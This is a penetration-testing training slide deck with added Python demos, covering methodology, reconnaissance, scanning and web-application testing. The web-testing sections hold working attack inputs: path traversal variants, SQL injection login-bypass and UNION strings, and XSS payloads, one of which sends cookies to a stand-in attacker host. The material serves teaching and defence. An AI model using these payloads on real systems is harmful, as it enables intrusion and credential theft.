Improving Application Security through Penetration Testing



Dominick Baier (dbaier@ernw.de)
Security Consultant / BS 7799 Lead Auditor
ERNW GmbH
Outline

•   What is Penetration Testing and Auditing
•   Standards and Ethics
•   The Process of Testing
•   Pen-Testing Web Applications
•   The Tools




"Improving the Security of Your Site by
Breaking Into it"
(Dan Farmer/Wietse Venema, 1993)
http://www.fish.com/security/admin-guide-to-cracking.html




Penetration Testing vs. Auditing

•   Penetration Testing
     – Simulating a motivated attacker for a specific amount of time
     – Black Box / White Box Approach
     – Is more like a snapshot of the current security of a system or a
       business process


•   Auditing
     – Analyzing
        • Configuration Files
        • Architecture
        • Source Code
     – Policy conformance
        • Operational Plans and Procedures

Why Penetration Testing

•   To measure the security of a system, network or a business
    process
     – By a third party

•   To assess possible Risks

•   To make the upper management "security aware"




Possible Goals of a Penetration Test

•   How much information about our network is publicly
    available ?
•   Is it possible to compromise this and that system ?
•   Is it possible to disturb business process X ?
•   How effectively do our security controls work?
     – Firewall
     – AntiVirus / Spam / Content Filter
     – Intrusion Detection Systems
•   Is our Information Security Policy correctly enforced ?
•   Can employees compromise workstation security?

•   "Are we safe ?"



What can be tested

•   Servers and Workstations
     – Web Server
     – Database Server
     – Domain Controller
     – Workstations
•   Infrastructure
     – Network Devices
     – Wireless Networks
     – Dial-In Access
     – VPNs
•   Applications
•   Employees (Social Engineering)


Attackers to simulate

•   Outside Attackers
     – Script Kiddies
     – Competitors
     – Terrorists
     – Journalists

•   Insiders
     – Employees
     – Disgruntled Employees
     – Contractors
     – Consultants




Standards

•   Pete Herzog's OSSTMM
    "Open Source Security Testing Methodology Manual"
     – Very practical approach
     – Checklists of what and in which order to test
     – List of tools

•   ISO 17799 / BS 7799 Standard for Information Security
     – Focuses more on the policy and paper work side of security
     – Extensive catalog of security controls
     – Defines a standard for audits

•   NIST Guidelines for Network Security Testing



Ethics

•   Findings are under strict NDAs

•   No information gathered during the test
     – is sent in clear text over the internet
     – is used for personal profit

•   ISACA Code of Professional Ethics
•   ISC2 Code of Ethics

•   Full Disclosure




The STRIDE Threat Model

•   STRIDE
     – Spoofing Identity
     – Tampering with data
     – Repudiation
     – Information Disclosure
     – Denial of Service
     – Elevation of Privilege




The Pen-Tester's Mantra

•   Segregation of Duties
•   Minimal Machine
•   Least Privilege
•   Patch-Level
•   Defense in Depth
•   Secure the Weakest Link
•   Strong Authentication




Course of Actions

•   Opening Meeting
     – Goals of the Pen-Test
     – Scope
     – Responsible Admins

•   The Audit / Test itself

•   The Report
     – Found issues
     – Countermeasures
     – Prioritization

•   Closing Meeting



Stages of a Pen-Test

•   Gathering Information
•   Analyzing the Infra-Structure
•   Analyzing the Machines
     – Fingerprinting
     – Port / Vulnerability-Scanning
     – Attacking the System / Proof of Concept
•   Analyzing Applications
     – Functional / Structural Analysis
     – Attacking Authentication and Authorization
     – Attacking Data and Back-End Communication
     – Attacking Clients




Information Gathering

•   In this phase you try to compile as much publicly available
    information as possible

    –   Internic
    –   IANA / RIPE
    –   Whois
    –   Google / Usenet
    –   Private homepages of employees
    –   Email Addresses
    –   Telephone numbers




Information Gathering

•   Google Search-Syntax

    –   allintitle:"Index of /etc"
    –   site:gov site:mil site:ztarget.com
    –   filetype:doc filetype:pdf filetype:xls
    –   intitle:, inurl:, allinurl:
    –   allinurl:mssql, allinurl:gw …
    –   inurl:".aspx?ReturnUrl="
    –   "+www.ernw.+de"
    –   related:www.ernw.de
    –   login site:www.microsoft.com
    –   [cached]


Information Gathering

•   Mailing-Lists / Forums / Usenet
     – Some vendors even post internal support questions to public
       newsgroups




Information Gathering

•   Mailing-Lists / Forum / Usenet
     – (screenshot slide; caption: "Invitation?")
Analyzing the Infra-Structure and Machines

•   A layered model
     – Two hosts, each a stack of layers, communicating over the network:

               Data                   Data

           Application             Application

             Service                Service

                OS                     OS

                         Network
Analyzing the Infra-Structure and Machines

•   The Reality (diagram reconstructed from the slide layout)
     – Browser  --HTTP-->  Web Server  --DCOM / CORBA-->  Application Server  --SOCKETS-->  Database Server
     – The Web Server serves the Web Content and authenticates users against an Auth Database via LDAP
     – The Database Server holds the Data and writes the Audit Logs
Analyzing the Infra-Structure and Machines

•   Querying System and DNS Information
•   Portscanning
•   Fingerprinting
•   Vulnerability Scanning
•   Exploiting a Vulnerability




Querying System and DNS Information

•   TraceRoute
     – Tracing the network route gives you information about
        • The provider
        • Type of connection
           – Simple / Redundant / Load Balanced
     – At which hop does ICMP get blocked?




Querying System and DNS Information

•   DNS Zone transfer
     – DNS servers should be configured to allow zone transfers only
       to specific peers (their secondary name servers)
     – DNS zones are very interesting
        • Which machines are listed in the zone
        • The IP network structure behind the names
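As an added example (not from the original slides), the Python below parses the text output of a zone transfer attempt, as `dig @ns1.example.com example.com AXFR` prints it, and pulls out what the slide calls interesting: the hosts listed, the /24 ranges they sit in, private RFC 1918 addresses that leak internal structure, and names that hint at high-value systems. The zone content, domain and addresses are constructed sample data; a correctly configured server would refuse the transfer and print "Transfer failed." instead.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: what a successful AXFR of a fictional zone looks like in dig output.
SAMPLE_AXFR = """\
; <<>> DiG 9.x <<>> @ns1.example.com example.com AXFR
example.com.            3600 IN SOA   ns1.example.com. hostmaster.example.com. 2004031201 7200 3600 604800 3600
example.com.            3600 IN NS    ns1.example.com.
example.com.            3600 IN MX    10 mail.example.com.
www.example.com.        3600 IN A     192.0.2.10
mail.example.com.       3600 IN A     192.0.2.25
ns1.example.com.        3600 IN A     192.0.2.53
vpn.example.com.        3600 IN A     198.51.100.4
dev-db.example.com.     3600 IN A     10.1.5.17
ldap.example.com.       3600 IN A     10.1.5.12
intranet.example.com.   3600 IN CNAME www.example.com.
;; Query time: 12 msec
"""

# owner, ttl, class, type, rdata (rdata may contain spaces, e.g. for SOA and MX)
RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.+?)\s*$")

# Address blocks that should never appear in a public zone
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Hostname fragments that usually mark internal or high-value systems (assumed list)
INTERESTING = ("dev", "test", "db", "sql", "ldap", "vpn", "admin", "intranet", "backup")


def parse_axfr(text):
    """Return (name, rrtype, rdata) tuples, skipping dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if m:
            name, _ttl, rrtype, rdata = m.groups()
            records.append((name.rstrip("."), rrtype, rdata))
    return records


def summarize(records):
    """Group A records by /24, flag leaked private addresses and telling hostnames."""
    by_network = defaultdict(list)
    private_hosts = []
    interesting = set()
    for name, rrtype, rdata in records:
        first_label = name.split(".")[0]
        if any(tag in first_label for tag in INTERESTING):
            interesting.add(name)
        if rrtype != "A":
            continue
        addr = ipaddress.ip_address(rdata)
        net = ipaddress.ip_network(f"{addr}/24", strict=False)
        by_network[str(net)].append(name)
        if any(addr in block for block in RFC1918):
            private_hosts.append(name)
    return {
        "networks": dict(by_network),
        "private_hosts": sorted(private_hosts),
        "interesting": sorted(interesting),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_axfr(SAMPLE_AXFR)).items():
        print(f"{key}: {value}")
```

The two private addresses in the 10.1.5.0/24 block are the finding a report would lead with: the public zone reveals an internal network, a database host and a directory server, even before any port is touched.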




Portscanning & Fingerprinting

•   Port scanning tells you which ports a machine listens on
•   Every open port is a reachable service and therefore potential
    attack surface
•   More advanced scanners also try to figure out what software
    (vendor and version) is behind a port



•   Most popular Port Scanners
     – SuperScan (www.foundstone.com)
     – NMAP (www.insecure.org/nmap)




Banner Grabbing

•   Connect with Netcat or Telnet to a service
•   You will often get detailed information
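The two preceding slides in one runnable piece, added here and not part of the original deck: a TCP connect() scan (the simplest thing nmap or SuperScan does), a banner grab that does what `nc host 80` followed by a typed `HEAD / HTTP/1.0` does, and a crude fingerprint taken from the Server header. So that it runs offline, the block also starts a throwaway localhost listener that plays the target; the banner it serves is a constructed string, not a real server's.

```python
import re
import socket
import threading

# Constructed banner for the stand-in target; the version string is made up.
FAKE_HTTP_BANNER = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c\r\n"
    b"Content-Length: 0\r\n\r\n"
)

HTTP_HEAD_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"
SERVER_HEADER_RE = re.compile(rb"^Server:\s*(.+?)\r?$", re.I | re.M)


def serve_banner(banner: bytes) -> int:
    """Localhost listener standing in for a real target. Reads whatever the
    client sends, answers with `banner`, closes. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.settimeout(1.0)
                try:
                    conn.recv(1024)        # swallow the probe, as a real daemon would
                    conn.sendall(banner)
                except OSError:            # timeout, or the scanner already hung up
                    pass

    threading.Thread(target=loop, daemon=True).start()
    return port


def connect_scan(host: str, ports, timeout: float = 0.5):
    """Connect scan: a port counts as open if the three-way handshake completes."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 2.0) -> bytes:
    """Connect, optionally send a protocol probe, read until the server closes
    or goes quiet. Some services talk first (SMTP, SSH); HTTP needs the probe."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            while len(b"".join(chunks)) < 4096:
                data = s.recv(1024)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def server_header(banner: bytes):
    """Fingerprint from the Server header, if the service volunteers one."""
    m = SERVER_HEADER_RE.search(banner)
    return m.group(1).decode("latin-1").strip() if m else None


if __name__ == "__main__":
    port = serve_banner(FAKE_HTTP_BANNER)
    print("open ports:", connect_scan("127.0.0.1", [port]))
    print("server:", server_header(grab_banner("127.0.0.1", port, HTTP_HEAD_PROBE)))
```

Against a real target, replace 127.0.0.1 and the port list with the scoped addresses; the `Server:` value is exactly what goes into the vulnerability investigation step that follows.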




Vulnerability Scanner

•   Automated scanners that check for known vulnerabilities
     – They often give you more information for vulnerability
       investigation

•   There are vulnerability and exploit databases on the internet
     – SecurityFocus (www.securityfocus.com)
     – Packet Storm (www.packetstormsecurity.com)




Vulnerability Scanner

•   System / Host Scanner
     – Nessus (www.nessus.org)
     – Retina (www.eeye.com)
     – ISS Security Scanner (www.iss.net)
     – Microsoft MBSA (www.microsoft.com)

•   Database Scanner
     – MetaCoreTex (www.metacoretex.com)
     – AppSecInc AppDetective (www.appsecinc.com)
     – ISS Database Scanner (www.iss.net)

•   Web Server Scanner
    – Nikto (www.cirt.net)



Vulnerability Investigation

•   www.securityfocus.com/bid




Vulnerability Investigation

•   www.packetstormsecurity.org




Pen-Testing Web Applications

•   Visualize the HTTP Traffic
     – Sniffer (e.g. Ethereal)
     – Web Proxies
        • Achilles (http://packetstormsecurity.nl/web/achilles-0-27.zip)
        • Fiddler (www.fiddlertool.com)
        • WebProxy (www.atstake.com)
     – Hand craft HTTP Requests
        • Wfetch & Tinyget (IIS6 Resource Kit)

•   Structural Analysis, tabular:

Page         Path       Auth?   SSL?   GET/POST   Comment
Index.aspx   /          N       N
login.aspx   /login/    N       Y      POST       Login Page
about.aspx   /about/    N       N                 Email Addresses
Structural Analysis

•   ...or graphical




Pen-Testing Web Applications

•   Try some URLs
     – Common Directories
         • /html, /images, /jsp, /cgi
     – "Hidden" Directories
         • /admin, /secure, /adm, /management
     – Backup and Log Files
         • /.bak, /backup, /back, /log, /logs, /archive, /old
     – Include Files
         • /include, /inc, /js, /global, /local
     – Localized Versions
         • /de, /en, /1033
     – trace.axd

•   Look at the HTTP status codes
     – Everything other than 404 is interesting (200, 301/302, 401, 403
       and 500 all mean something is there)
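An added example for the two bullets above (not code from the slides): it requests each candidate path with a HEAD and keeps everything that does not answer like a missing resource. The one caveat a practitioner needs is the "soft 404": some sites answer 200 for any unknown path, so the baseline is measured first with a random name and passed in, instead of assuming 404. The `fetch` parameter exists so the probing logic can be run against a fake responder; the base URL and the fake status table are assumptions.

```python
import urllib.error
import urllib.request
import uuid

# Candidate paths from the slide
CANDIDATE_PATHS = [
    "/html", "/images", "/jsp", "/cgi",
    "/admin", "/secure", "/adm", "/management",
    "/.bak", "/backup", "/back", "/log", "/logs", "/archive", "/old",
    "/include", "/inc", "/js", "/global", "/local",
    "/de", "/en", "/1033",
    "/trace.axd",
]


def http_status(url: str, timeout: float = 5.0) -> int:
    """Real fetch: HEAD request, returning the status code (4xx/5xx included)."""
    req = urllib.request.Request(url, method="HEAD", headers={"User-Agent": "pentest-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(code: int) -> str:
    """What a non-404 answer usually means for the tester."""
    if code == 200:
        return "exists, readable"
    if code in (301, 302, 307, 308):
        return "redirect (directory probably exists)"
    if code in (401, 403):
        return "exists, access controlled"
    if code >= 500:
        return "server error (handler present, input not expected)"
    return "other"


def measure_baseline(base_url: str, fetch=http_status) -> int:
    """Ask for a name that cannot exist; whatever comes back is 'not found' here."""
    return fetch(base_url.rstrip("/") + "/" + uuid.uuid4().hex)


def probe_paths(base_url: str, paths, fetch=http_status, baseline_code: int = 404):
    """Request every candidate and keep those that differ from the baseline."""
    base = base_url.rstrip("/")
    findings = {}
    for path in paths:
        code = fetch(base + path)
        if code != baseline_code:
            findings[path] = (code, classify(code))
    return findings


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"  # assumed target
    baseline = measure_baseline(target)
    for path, (code, meaning) in probe_paths(target, CANDIDATE_PATHS, baseline_code=baseline).items():
        print(f"{code} {path:15s} {meaning}")
```

A 401 or 403 on /admin is as much a finding as a 200: the directory exists, and the access control in front of it is now a target for the authentication and authorization stage.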


Pen-Testing Web Applications

•   Look for
     – Cascading Style Sheets (.css)
     – XML files / XML stylesheets (.xml / .xsl)
     – JavaScript files (.js)
     – Include files (.inc)
     – Text files (.txt)
     – Comments
     – Client-Side Validation
     – Forms
        • Hidden Fields
        • Password Fields
        • MaxLength Attributes


  Pen-Testing Web Applications

  •   "Odd" Query Strings

www.site.com/show.aspx?content=marketing.xml
www.site.com/UserArea/default.php?UserID=5
www.site.com/dbsubmit.php?Title=Mr&Phone=123
www.site.com/menu.asp?sid=73299


  •   Cookie values




Canonicalization Errors

•   Popular Examples
     – Apache WebServer
        • /scripts and /SCRIPTS
     – Microsoft IIS 5
        • ../ and .%2e%2f
     – ISS Firewall
        • action=delete and action=%64elete
     – Microsoft IE4
        • Dotless IP Bug

    – ASP.NET Authorization Canonicalization Bug
       • http://localhost/formsec/secure%5csecret.aspx


Resource Names

•   Example

http://server/cms/show.aspx?file=content.xml


•   Can I use this page to show other files?

http://server/cms/show.aspx?file=../web.config



•   Try some variations
http://server/cms/show.aspx?file=../web.config.
http://server/cms/show.aspx?file=../web.config::$DATA
http://server/cms/show.aspx?file=..%5cweb.config
http://server/cms/show.aspx?file=..%255cweb.config
http://server/cms/show.aspx?file=..%%35%63web.config
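One added example (not from the slides) for both the Canonicalization Errors slide and the Resource Names slide above. It runs the six `file=` variants through two checks: a naive blacklist that rejects the literal `../`, which is what a filter that loses to `%5c`, `%255c` and `%%35%63` looks like, and a hardened check that first canonicalizes the parameter (full URL decoding until stable, backslash treated as a separator as Windows does, NTFS `::$DATA` stream and trailing dots removed, `..` resolved) and only then asks whether the result is still inside the content root. The root directory `/var/www/cms` is an assumption standing in for wherever show.aspx reads its files.

```python
import os
import urllib.parse

# Variants from the slide: dot suffix, NTFS stream, single/double/overlong encoding of "\"
TRAVERSAL_VARIANTS = [
    "../web.config",
    "../web.config.",
    "../web.config::$DATA",
    "..%5cweb.config",
    "..%255cweb.config",
    "..%%35%63web.config",
]


def naive_is_safe(file_param: str) -> bool:
    """A blacklist on the one spelling the developer thought of, applied to the
    raw parameter. Every encoded variant walks straight past it."""
    return "../" not in file_param


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """URL-decode until the string stops changing: ..%255c is ..%5c after one
    round and ..\\ after two, so a filter that decodes once stays blind."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def canonicalize(root: str, file_param: str) -> str:
    """Turn the request parameter into the one absolute path the OS would open.
    An absolute name ('/etc/passwd') makes os.path.join drop the root, which
    the containment check below also catches."""
    name = decode_fully(file_param).replace("\\", "/")   # Windows separator
    name = name.split("::")[0].rstrip(". ")               # ::$DATA, trailing dots/spaces
    return os.path.realpath(os.path.join(root, name))


def hardened_is_safe(root: str, file_param: str) -> bool:
    """Decide on the canonical path, never on the raw string: it must stay inside root."""
    root_real = os.path.realpath(root)
    target = canonicalize(root, file_param)
    return target == root_real or target.startswith(root_real + os.sep)


if __name__ == "__main__":
    root = "/var/www/cms"   # assumed content directory of the fictional show.aspx
    for variant in ["content.xml"] + TRAVERSAL_VARIANTS:
        print(f"{variant:26s} naive={str(naive_is_safe(variant)):5s} "
              f"hardened={hardened_is_safe(root, variant)}")
```

The same normalization (backslash to slash before the authorization decision) is what the ASP.NET `secure%5csecret.aspx` case on the previous slide lacked: the authorization module compared the raw path against `/secure/` while the file system happily opened `secure\secret.aspx`.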


Testing for SQL Injection

•   Test whether you can inject SQL code through form fields and parameters
•   If the programmer simply concatenates user input into SQL
    statements, a database compromise is very likely possible

•   Try to generate errors
     – Insert a ' character
     – Does the application behave differently?
     – Is maybe even a database error returned?

•   You can execute nasty statements through SQL injection
     – UNION (read other tables through the same query)
     – DROP ...
     – xp_cmdshell (operating system commands on MS SQL Server)
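The slide's procedure as an added, runnable example (not from the deck): a concatenating login query next to its parameterized twin, the single-quote probe that tells them apart by the error it provokes, the `--` comment that cuts the password check off, and a UNION that reads the credentials table through a harmless-looking lookup. The database is an in-memory SQLite with constructed rows; it has no xp_cmdshell, so that last step of the slide is not demonstrated here.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's database, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, pw, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, user: str, password: str):
    """The pattern the slide warns about: user input concatenated into the statement."""
    sql = ("SELECT name, role FROM users WHERE name = '" + user
           + "' AND pw = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, user: str, password: str):
    """Same query with bound parameters: input can never change the statement's shape."""
    return conn.execute("SELECT name, role FROM users WHERE name = ? AND pw = ?",
                        (user, password)).fetchone()


def search_vulnerable(conn, name: str):
    """A listing page built the same bad way; UNION rides on it."""
    return conn.execute("SELECT name, role FROM users WHERE name = '" + name + "'").fetchall()


def search_safe(conn, name: str):
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def probe(login, conn, field: str = "user") -> str:
    """The slide's first test: drop a lone quote into a field and watch for a
    database error. Returns a short verdict instead of raising."""
    args = {"user": "x", "password": "x"}
    args[field] = "x'"
    try:
        login(conn, args["user"], args["password"])
    except sqlite3.OperationalError as err:
        return f"db error leaked: {err}"
    return "no error"


if __name__ == "__main__":
    conn = make_db()
    print("probe vulnerable: ", probe(login_vulnerable, conn))
    print("probe safe:       ", probe(login_safe, conn))
    # Authentication bypass: "--" comments out the password clause
    print("bypass vulnerable:", login_vulnerable(conn, "alice'--", "wrong"))
    print("bypass safe:      ", login_safe(conn, "alice'--", "wrong"))
    # UNION: pull every password through a page that was only meant to show roles
    payload = "x' UNION SELECT name, pw FROM users--"
    print("union vulnerable: ", search_vulnerable(conn, payload))
    print("union safe:       ", search_safe(conn, payload))
```

A verbose database error is the finding at probe time; the bypass and the UNION are the proof of concept the report attaches to it. Whether an application is exploitable is decided by the concatenation, not by the input validation in front of it, which is why the fix is the parameterized form.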

Testing for Cross Site Scripting

•   Cross Site Scripting lets an attacker inject script code into web
    pages
•   This happens when the application directly outputs client
    input without proper HTML encoding
•   Can be hard to find - look in
     – Query strings
     – Form fields
     – HTTP headers

•   Enables cookie stealing / harvesting attacks

•   Many developers rely on ASP.NET's ValidateRequest
     – Try <%00...> encoding (a NUL byte after the "<" can slip past the
       filter while the browser still renders the tag)
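An added example for the slide above; it is not code from the deck and not the real ValidateRequest implementation. It contrasts a page that reflects a parameter as-is with one that HTML-encodes it, and puts a request filter of the blacklist kind (a `<` followed by a letter, an `on…=` handler, `javascript:`) in front of both. The `<%00script>` payload from the slide, shown URL-decoded, is never flagged by the blacklist, whereas output encoding neutralizes it regardless. The payloads and the attacker host are constructed.

```python
import html
import re

# Blacklist of the request-validation kind, assumed for illustration.
VALIDATE_REQUEST_LIKE = re.compile(r"<[a-zA-Z/!]|\bon\w+\s*=|javascript:", re.I)


def request_validator_flags(value: str) -> bool:
    """Would a blacklist filter on the input reject this request?"""
    return VALIDATE_REQUEST_LIKE.search(value) is not None


def render_vulnerable(name: str) -> str:
    """Reflects the query string straight into the page."""
    return f"<p>Hello, {name}</p>"


def render_safe(name: str) -> str:
    """Output encoding for the HTML text/attribute context: < > & \" ' become entities."""
    return f"<p>Hello, {html.escape(name, quote=True)}</p>"


def strip_nulls(value: str) -> str:
    return value.replace("\x00", "")


def looks_like_script(page: str) -> bool:
    """Tester's check on a response: is a script tag present once the NUL
    bytes that a lenient browser ignores are dropped?"""
    return re.search(r"<script", strip_nulls(page), re.I) is not None


# Constructed payloads; http://attacker.example/ is a placeholder collector.
PAYLOADS = {
    "plain": "<script>alert(document.cookie)</script>",
    "nul-trick": "<\x00script>alert(document.cookie)<\x00/script>",
    "handler": '"><img src=x onerror=alert(1)>',
    "cookie-theft": "<\x00script>location='http://attacker.example/?c='+document.cookie<\x00/script>",
}


def evaluate(payload: str) -> dict:
    """For one payload: does the filter catch it, and does either page end up executing it?"""
    return {
        "filtered": request_validator_flags(payload),
        "vulnerable_executes": looks_like_script(render_vulnerable(payload)),
        "safe_executes": looks_like_script(render_safe(payload)),
    }


if __name__ == "__main__":
    for label, payload in PAYLOADS.items():
        print(f"{label:13s} {evaluate(payload)}")
```

`html.escape` is right for the HTML text and attribute contexts the slide talks about; input reflected into a JavaScript string, a URL or a CSS value needs the encoding of that context instead, and the blacklist remains what it is: a speed bump, not a control.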

Tools

•   Automatic Mirroring of Web Sites
     – wget (www.gnu.org/directory/wget.html)
     – Black Widow (www.softbytelabs.com)
     – Teleport Pro (www.tenmax.com)

•   Web Scanner
    – WebInspect (www.spidynamics.com)
    – NStealth (www.nstalker.com)

•   ASP.NET Specific Scanners
     – ASP.NET Security Analyzer (www.owasp.org)
     – ASP.NET Shared Hosting Analyzer (www.owasp.org)


Conclusion

•   Pen-testing is not black magic
•   It is a very systematic procedure

•   If you follow the 7 golden rules (the Pen-Tester's Mantra), you can
    eliminate most of the vulnerabilities

•   Do regular Pen-Tests or Audits – you can only benefit
     – Internal and third party




•   Questions ?




you can download the slides from www.leastprivilege.com




Links

•   OSSTMM
     – www.isecom.org
•   NIST Draft Guidelines to Network Security Testing
     – http://csrc.nist.gov/publications/drafts/security-testing.pdf
•   ISC2 Code of Ethics:
     – https://www.isc2.org/cgi/content.cgi?category=12
•   ISACA Code of Professional Ethics
     – http://www.isaca.org/Template.cfm?Section=Code_of_Ethics1




Links

•   Wfetch
     – http://download.microsoft.com/download/d/e/5/de5351d6-4463-4cc3-a27c-3e2274263c43/wfetch.exe
•   NetCat
     – http://www.atstake.com/research/tools/network_utilities/nc11nt.zip



